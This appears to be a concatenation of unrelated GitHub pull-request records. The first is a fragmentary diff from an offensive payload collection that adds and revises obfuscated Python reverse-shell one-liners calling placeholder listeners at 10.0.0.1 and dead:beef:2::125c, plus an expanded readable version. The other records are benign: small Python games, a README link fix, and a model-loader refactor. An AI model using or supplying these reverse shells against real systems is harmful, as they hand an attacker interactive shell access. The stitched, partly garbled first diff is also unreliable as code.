+```
+```python
+python -c 'a=__import__;b=a("socket").socket;c=a("subprocess").call;s=b();s.connect(("10.0.0.1",4242));f=s.fileno;c(["/bin/sh","-i"],stdin=f(),stdout=f(),stderr=f())'
```
IPv6
```python
-python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
+python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
+```
+
+IPv6 (No Spaces)
+```python
+python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
```
+IPv6 (No Spaces, Shortened)
```python
-python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
```
Windows only
| - Revised the existing Linux Python reverse shells
- Added new Linux Python reverse shells
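For reference, the shortened one-liners above all expand to roughly the readable form below (same technique; the address and port are placeholders for your own listener):
```python
import os
import pty
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.1", 4242))  # placeholder listener address and port
for fd in (0, 1, 2):           # redirect stdin, stdout and stderr
    os.dup2(s.fileno(), fd)
pty.spawn("/bin/sh")
```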
| https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/399 | 2021-07-27T02:00:41Z | 2021-07-31T09:26:37Z | 2021-07-31T09:26:37Z | 2021-07-31T09:26:37Z | 1,711 | swisskyrepo/PayloadsAllTheThings | 8,630 |
rock_paper_scissor_game | diff --git a/rock_paper_scissor_game b/rock_paper_scissor_game
new file mode 100644
index 0000000000..565a06f73b
--- /dev/null
+++ b/rock_paper_scissor_game
@@ -0,0 +1,43 @@
+#let
+# 0 - rock
+# 1 - paper
+# 2 - scissor
+
+import random
+
+def name_to_number(name):
+ if name == "rock":
+ name = 0
+ elif name == "paper":
+ name = 1
+ elif name == "scissors":
+ name = 2
+ return name
+
+def number_to_name(number):
+ if number == 0:
+ return "rock"
+ elif number == 1:
+ return "paper"
+ elif number == 2:
+ return "scissors"
+
+def game(player_choice):
+ print()
+ name = player_choice
+ print(name)
+ number = name_to_number(name)
+ comp_number = random.randrange(0, 3) # 0, 1 or 2, so scissors can come up too
+ comp_choice = number_to_name(comp_number)
+ print(comp_choice)
+
+ comp = -int(comp_number)
+ play = int(number)
+ diff = (comp + play)%5
+
+ if diff == 1 or diff == 3:
+ print "you won!!!"
+ elif diff == 0:
+ print "draw"
+ elif diff == 2 or diff == 4:
+ print "you lose!!!"
| https://api.github.com/repos/geekcomputers/Python/pulls/382 | 2018-10-03T12:39:17Z | 2018-10-03T19:19:58Z | 2018-10-03T19:19:58Z | 2018-10-03T19:20:02Z | 352 | geekcomputers/Python | 31,436 |
|
Updated Brushfire deadlink to proper repo | diff --git a/README.md b/README.md
index 90990f9e..45b20936 100644
--- a/README.md
+++ b/README.md
@@ -947,7 +947,7 @@ on MNIST digits[DEEP LEARNING]
#### General-Purpose Machine Learning
* [Conjecture](https://github.com/etsy/Conjecture) - Scalable Machine Learning in Scalding
-* [brushfire](https://github.com/avibryant/brushfire) - decision trees and random forests for scalding
+* [brushfire](https://github.com/stripe/brushfire) - Distributed decision tree ensemble learning in Scala
* [ganitha](https://github.com/tresata/ganitha) - scalding powered machine learning
* [adam](https://github.com/bigdatagenomics/adam) - A genomics processing engine and specialized file format built using Apache Avro, Apache Spark and Parquet. Apache 2 licensed.
* [bioscala](https://github.com/bioscala/bioscala) - Bioinformatics for the Scala programming language
| https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/210 | 2015-12-09T16:49:50Z | 2015-12-09T16:50:40Z | 2015-12-09T16:50:40Z | 2015-12-09T16:50:43Z | 242 | josephmisiti/awesome-machine-learning | 52,101 |
|
Be more clear about Spandrel model nomenclature and types | diff --git a/extensions-builtin/SwinIR/scripts/swinir_model.py b/extensions-builtin/SwinIR/scripts/swinir_model.py
index aae159af56e..95c7ec648ef 100644
--- a/extensions-builtin/SwinIR/scripts/swinir_model.py
+++ b/extensions-builtin/SwinIR/scripts/swinir_model.py
@@ -71,7 +71,7 @@ def load_model(self, path, scale=4):
else:
filename = path
- model = modelloader.load_spandrel_model(
+ model_descriptor = modelloader.load_spandrel_model(
filename,
device=self._get_device(),
dtype=devices.dtype,
@@ -79,10 +79,10 @@ def load_model(self, path, scale=4):
)
if getattr(opts, 'SWIN_torch_compile', False):
try:
- model = torch.compile(model)
+ model_descriptor.model.compile()
except Exception:
logger.warning("Failed to compile SwinIR model, fallback to JIT", exc_info=True)
- return model
+ return model_descriptor
def _get_device(self):
return devices.get_device_for('swinir')
diff --git a/modules/gfpgan_model.py b/modules/gfpgan_model.py
index 48f8ad5e294..445b040925e 100644
--- a/modules/gfpgan_model.py
+++ b/modules/gfpgan_model.py
@@ -3,6 +3,8 @@
import logging
import os
+import torch
+
from modules import (
devices,
errors,
@@ -25,7 +27,7 @@ def name(self):
def get_device(self):
return devices.device_gfpgan
- def load_net(self) -> None:
+ def load_net(self) -> torch.Module:
for model_path in modelloader.load_models(
model_path=self.model_path,
model_url=model_url,
@@ -34,13 +36,13 @@ def load_net(self) -> None:
ext_filter=['.pth'],
):
if 'GFPGAN' in os.path.basename(model_path):
- net = modelloader.load_spandrel_model(
+ model = modelloader.load_spandrel_model(
model_path,
device=self.get_device(),
expected_architecture='GFPGAN',
).model
- net.different_w = True # see https://github.com/chaiNNer-org/spandrel/pull/81
- return net
+ model.different_w = True # see https://github.com/chaiNNer-org/spandrel/pull/81
+ return model
raise ValueError("No GFPGAN model found")
def restore(self, np_image):
diff --git a/modules/modelloader.py b/modules/modelloader.py
index 0b89d682c55..a7194137571 100644
--- a/modules/modelloader.py
+++ b/modules/modelloader.py
@@ -1,8 +1,9 @@
from __future__ import annotations
+import importlib
import logging
import os
-import importlib
+from typing import TYPE_CHECKING
from urllib.parse import urlparse
import torch
@@ -10,6 +11,8 @@
from modules import shared
from modules.upscaler import Upscaler, UpscalerLanczos, UpscalerNearest, UpscalerNone
+if TYPE_CHECKING:
+ import spandrel
logger = logging.getLogger(__name__)
@@ -140,19 +143,19 @@ def load_spandrel_model(
*,
device: str | torch.device | None,
half: bool = False,
- dtype: str | None = None,
+ dtype: str | torch.dtype | None = None,
expected_architecture: str | None = None,
-):
+) -> spandrel.ModelDescriptor:
import spandrel
- model = spandrel.ModelLoader(device=device).load_from_file(path)
- if expected_architecture and model.architecture != expected_architecture:
+ model_descriptor = spandrel.ModelLoader(device=device).load_from_file(path)
+ if expected_architecture and model_descriptor.architecture != expected_architecture:
logger.warning(
- f"Model {path!r} is not a {expected_architecture!r} model (got {model.architecture!r})",
+ f"Model {path!r} is not a {expected_architecture!r} model (got {model_descriptor.architecture!r})",
)
if half:
- model = model.model.half()
+ model_descriptor.model.half()
if dtype:
- model = model.model.to(dtype=dtype)
- model.eval()
- logger.debug("Loaded %s from %s (device=%s, half=%s, dtype=%s)", model, path, device, half, dtype)
- return model
+ model_descriptor.model.to(dtype=dtype)
+ model_descriptor.model.eval()
+ logger.debug("Loaded %s from %s (device=%s, half=%s, dtype=%s)", model_descriptor, path, device, half, dtype)
+ return model_descriptor
diff --git a/modules/realesrgan_model.py b/modules/realesrgan_model.py
index 65f2e880668..4d35b695c3b 100644
--- a/modules/realesrgan_model.py
+++ b/modules/realesrgan_model.py
@@ -36,14 +36,14 @@ def do_upscale(self, img, path):
errors.report(f"Unable to load RealESRGAN model {path}", exc_info=True)
return img
- mod = modelloader.load_spandrel_model(
+ model_descriptor = modelloader.load_spandrel_model(
info.local_data_path,
device=self.device,
half=(not cmd_opts.no_half and not cmd_opts.upcast_sampling),
expected_architecture="ESRGAN", # "RealESRGAN" isn't a specific thing for Spandrel
)
return upscale_with_model(
- mod,
+ model_descriptor,
img,
tile_size=opts.ESRGAN_tile,
tile_overlap=opts.ESRGAN_tile_overlap,
diff --git a/modules/upscaler_utils.py b/modules/upscaler_utils.py
index dde5d7ad43a..174c9bc3713 100644
--- a/modules/upscaler_utils.py
+++ b/modules/upscaler_utils.py
@@ -6,7 +6,7 @@
import tqdm
from PIL import Image
-from modules import devices, images
+from modules import images
logger = logging.getLogger(__name__)
| ## Description
Depending on the value of `half` and `dtype`, `load_spandrel_model` could have returned a `torch.Module` instead of a `spandrel.ModelDescriptor`. Now it's certain to only return a descriptor (and typed as such).
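In other words, the fix swaps rebinding for in-place mutation. A simplified, self-contained sketch of the before/after (`ModelDescriptor` here is only a stand-in for the spandrel class):
```python
from dataclasses import dataclass

import torch

@dataclass
class ModelDescriptor:  # stand-in for spandrel.ModelDescriptor
    model: torch.nn.Module

desc = ModelDescriptor(model=torch.nn.Linear(4, 4))

# Before: .half() returns the inner module, so reassignment silently
# replaced the descriptor with a bare torch.nn.Module.
rebound = desc.model.half()

# After: mutate the wrapped module in place; desc keeps its type.
desc.model.half()
print(type(rebound).__name__, type(desc).__name__)  # Linear ModelDescriptor
```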
Follows up on 3be90740316f8fbb950b31d440458a5e8ed4beb3 and 8100e901ab0c5b04d289eebb722c8a653b8beef1, somewhat...
## Checklist:
- [ ] I have read [contributing wiki page](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing)
- [ ] I have performed a self-review of my own code
- [ ] My code follows the [style guidelines](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing#code-style)
- [ ] My code passes [tests](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Tests)
| https://api.github.com/repos/AUTOMATIC1111/stable-diffusion-webui/pulls/14477 | 2023-12-30T22:11:53Z | 2023-12-30T22:38:44Z | 2023-12-30T22:38:44Z | 2023-12-30T22:38:44Z | 1,432 | AUTOMATIC1111/stable-diffusion-webui | 40,383 |
Added some cli board games | diff --git a/BoardGame-CLI/snakeLadder.py b/BoardGame-CLI/snakeLadder.py
new file mode 100644
index 0000000000..956f690d4b
--- /dev/null
+++ b/BoardGame-CLI/snakeLadder.py
@@ -0,0 +1,168 @@
+import random
+
+# Taking players data
+players = {} # stores players name their locations
+isReady = {}
+current_loc = 1 # starting location for every player
+
+imp = True
+
+
+# players input function
+def player_input():
+ global players
+ global current_loc
+ global isReady
+
+ y = True
+ while y:
+ player_num = int(input("Enter the number of players: "))
+ if player_num > 0:
+ for i in range(player_num):
+ name = input(f"Enter player {i+1} name: ")
+ players[name] = current_loc
+ isReady[name] = False
+ y = False
+ play() # play function call
+
+ else:
+ print("Number of player cannot be zero")
+ print()
+
+
+# Dice roll method
+def roll():
+ # print(players)
+ return random.randrange(1, 7)
+
+
+# play method
+def play():
+ global players
+ global isReady
+ global imp
+
+ while imp:
+ print("/"*20)
+ print("1 -> roll the dice (or enter)")
+ print("2 -> start new game")
+ print("3 -> exit the game")
+ print("/"*20)
+
+ for i in players:
+ n = input("{}'s turn: ".format(i)) or 1
+ n = int(n)
+
+ if players[i] < 100:
+ if n == 1:
+ temp1 = roll()
+ print(f"you got {temp1}")
+ print("")
+
+ if isReady[i] == False and temp1 == 6:
+ isReady[i] = True
+
+ if isReady[i]:
+ looproll = temp1
+ while looproll == 6:
+ looproll = roll()
+ temp1 += looproll
+ print(f"you got {looproll} ")
+ print("")
+ # print(temp1)
+ if (players[i] + temp1) > 100:
+ pass
+ elif (players[i] + temp1) < 100:
+ players[i] += temp1
+ players[i] = move(players[i], i)
+ elif (players[i] + temp1) == 100:
+ print(f"congrats {i} you won !!!")
+ imp = False
+ return
+
+ print(f"you are at position {players[i]}")
+
+ elif n == 2:
+ players = {} # stores players and their locations
+ isReady = {}
+ current_loc = 0 # reset the starting location
+ player_input()
+
+ elif n == 3:
+ print("Bye Bye")
+ imp = False
+
+ else:
+ print("pls enter a valid input")
+
+
+# Move method
+def move(a, i):
+ global players
+ global imp
+ temp_loc = players[i]
+
+ if (temp_loc) < 100:
+ temp_loc = ladder(temp_loc, i)
+ temp_loc = snake(temp_loc, i)
+
+ return temp_loc
+
+
+# snake bite code
+def snake(c, i):
+ if (c == 32):
+ players[i] = 10
+ elif (c == 36):
+ players[i] = 6
+ elif (c == 48):
+ players[i] = 26
+ elif (c == 63):
+ players[i] = 18
+ elif (c == 88):
+ players[i] = 24
+ elif (c == 95):
+ players[i] = 56
+ elif (c == 97):
+ players[i] = 78
+ else:
+ return players[i]
+ print(f"You got bitten by a snake now you are at {players[i]}")
+
+ return players[i]
+
+
+# ladder code
+def ladder(a, i):
+ global players
+
+ if (a == 4):
+ players[i] = 14
+ elif (a == 8):
+ players[i] = 30
+ elif (a == 20):
+ players[i] = 38
+ elif (a == 40):
+ players[i] = 42
+ elif (a == 28):
+ players[i] = 76
+ elif (a == 50):
+ players[i] = 67
+ elif (a == 71):
+ players[i] = 92
+ elif (a == 88):
+ players[i] = 99
+ else:
+ return players[i]
+ print(f"You got a ladder now you are at {players[i]}")
+
+ return players[i]
+
+
+# while run:
+print("/"*40)
+print("Welcome to the snake ladder game !!!!!!!")
+print("/"*40)
+
+
+player_input()
diff --git a/BoardGame-CLI/uno.py b/BoardGame-CLI/uno.py
new file mode 100644
index 0000000000..4f36372a5f
--- /dev/null
+++ b/BoardGame-CLI/uno.py
@@ -0,0 +1,186 @@
+# uno game #
+
+import random
+"""
+Generate the UNO deck of 108 cards.
+Parameters: None
+Return values: deck=>list
+"""
+
+
+def buildDeck():
+ deck = []
+ # example card:Red 7,Green 8, Blue skip
+ colours = ["Red", "Green", "Yellow", "Blue"]
+ values = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, "Draw Two", "Skip", "Reverse"]
+ wilds = ["Wild", "Wild Draw Four"]
+ for colour in colours:
+ for value in values:
+ cardVal = "{} {}".format(colour, value)
+ deck.append(cardVal)
+ if value != 0:
+ deck.append(cardVal)
+ for i in range(4):
+ deck.append(wilds[0])
+ deck.append(wilds[1])
+ print(deck)
+ return deck
+
+
+"""
+Shuffles a list of items passed into it
+Parameters: deck=>list
+Return values: deck=>list
+"""
+
+
+def shuffleDeck(deck):
+ for cardPos in range(len(deck)):
+ randPos = random.randint(0, 107)
+ deck[cardPos], deck[randPos] = deck[randPos], deck[cardPos]
+ return deck
+
+
+"""Draw card function that draws a specified number of cards off the top of the deck
+Parameters: numCards -> integer
+Return: cardsDrawn -> list
+"""
+
+
+def drawCards(numCards):
+ cardsDrawn = []
+ for x in range(numCards):
+ cardsDrawn.append(unoDeck.pop(0))
+ return cardsDrawn
+
+
+"""
+Print formatted list of player's hand
+Parameter: player->integer , playerHand->list
+Return: None
+"""
+
+
+def showHand(player, playerHand):
+ print("Player {}'s Turn".format(players_name[player]))
+ print("Your Hand")
+ print("------------------")
+ y = 1
+ for card in playerHand:
+ print("{}) {}".format(y, card))
+ y += 1
+ print("")
+
+
+"""
+Check whether a player is able to play a card, or not
+Parameters: discardCard->string,value->string, playerHand->list
+Return: boolean
+"""
+
+
+def canPlay(colour, value, playerHand):
+ for card in playerHand:
+ if "Wild" in card:
+ return True
+ elif colour in card or value in card:
+ return True
+ return False
+
+
+unoDeck = buildDeck()
+unoDeck = shuffleDeck(unoDeck)
+unoDeck = shuffleDeck(unoDeck)
+discards = []
+
+players_name = []
+players = []
+colours = ["Red", "Green", "Yellow", "Blue"]
+numPlayers = int(input("How many players?"))
+while numPlayers < 2 or numPlayers > 4:
+ numPlayers = int(
+ input("Invalid. Please enter a number between 2-4.\nHow many players?"))
+for player in range(numPlayers):
+ players_name.append(input("Enter player {} name: ".format(player+1)))
+ players.append(drawCards(5))
+
+
+playerTurn = 0
+playDirection = 1
+playing = True
+discards.append(unoDeck.pop(0))
+splitCard = discards[0].split(" ", 1)
+currentColour = splitCard[0]
+if currentColour != "Wild":
+ cardVal = splitCard[1]
+else:
+ cardVal = "Any"
+
+while playing:
+ showHand(playerTurn, players[playerTurn])
+ print("Card on top of discard pile: {}".format(discards[-1]))
+ if canPlay(currentColour, cardVal, players[playerTurn]):
+ cardChosen = int(input("Which card do you want to play?"))
+ while not canPlay(currentColour, cardVal, [players[playerTurn][cardChosen-1]]):
+ cardChosen = int(
+ input("Not a valid card. Which card do you want to play?"))
+ print("You played {}".format(players[playerTurn][cardChosen-1]))
+ discards.append(players[playerTurn].pop(cardChosen-1))
+
+ # check if player won
+ if len(players[playerTurn]) == 0:
+ playing = False
+ # winner = "Player {}".format(playerTurn+1)
+ winner = players_name[playerTurn]
+ else:
+ # check for special cards
+ splitCard = discards[-1].split(" ", 1)
+ currentColour = splitCard[0]
+ if len(splitCard) == 1:
+ cardVal = "Any"
+ else:
+ cardVal = splitCard[1]
+ if currentColour == "Wild":
+ for x in range(len(colours)):
+ print("{}) {}".format(x+1, colours[x]))
+ newColour = int(
+ input("What colour would you like to choose? "))
+ while newColour < 1 or newColour > 4:
+ newColour = int(
+ input("Invalid option. What colour would you like to choose"))
+ currentColour = colours[newColour-1]
+ if cardVal == "Reverse":
+ playDirection = playDirection * -1
+ elif cardVal == "Skip":
+ playerTurn += playDirection
+ if playerTurn >= numPlayers:
+ playerTurn = 0
+ elif playerTurn < 0:
+ playerTurn = numPlayers-1
+ elif cardVal == "Draw Two":
+ playerDraw = playerTurn+playDirection
+ if playerDraw == numPlayers:
+ playerDraw = 0
+ elif playerDraw < 0:
+ playerDraw = numPlayers-1
+ players[playerDraw].extend(drawCards(2))
+ elif cardVal == "Draw Four":
+ playerDraw = playerTurn+playDirection
+ if playerDraw == numPlayers:
+ playerDraw = 0
+ elif playerDraw < 0:
+ playerDraw = numPlayers-1
+ players[playerDraw].extend(drawCards(4))
+ print("")
+ else:
+ print("You can't play. You have to draw a card.")
+ players[playerTurn].extend(drawCards(1))
+
+ playerTurn += playDirection
+ if playerTurn >= numPlayers:
+ playerTurn = 0
+ elif playerTurn < 0:
+ playerTurn = numPlayers-1
+
+print("Game Over")
+print("{} is the Winner!".format(winner))
| Snakes and Ladders and UNO, both multiplayer board games implemented in Python. | https://api.github.com/repos/geekcomputers/Python/pulls/1513 | 2022-05-14T12:24:54Z | 2022-05-14T15:15:37Z | 2022-05-14T15:15:37Z | 2022-05-14T15:15:37Z | 2,818 | geekcomputers/Python | 31,708 |
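As a closing aside on the snakeLadder diff above: the `elif` chains in `snake()` and `ladder()` could be table-driven. A sketch (square 88 keeps the ladder destination, matching the original flow where `ladder()` runs before `snake()`):
```python
JUMPS = {
    # ladders (up)
    4: 14, 8: 30, 20: 38, 28: 76, 40: 42, 50: 67, 71: 92, 88: 99,
    # snakes (down)
    32: 10, 36: 6, 48: 26, 63: 18, 95: 56, 97: 78,
}

def apply_jumps(pos: int) -> int:
    """Return the square a player lands on after any snake or ladder."""
    return JUMPS.get(pos, pos)

assert apply_jumps(4) == 14    # ladder up
assert apply_jumps(63) == 18   # snake down
assert apply_jumps(88) == 99   # ladder wins on the shared square
assert apply_jumps(55) == 55   # plain square
```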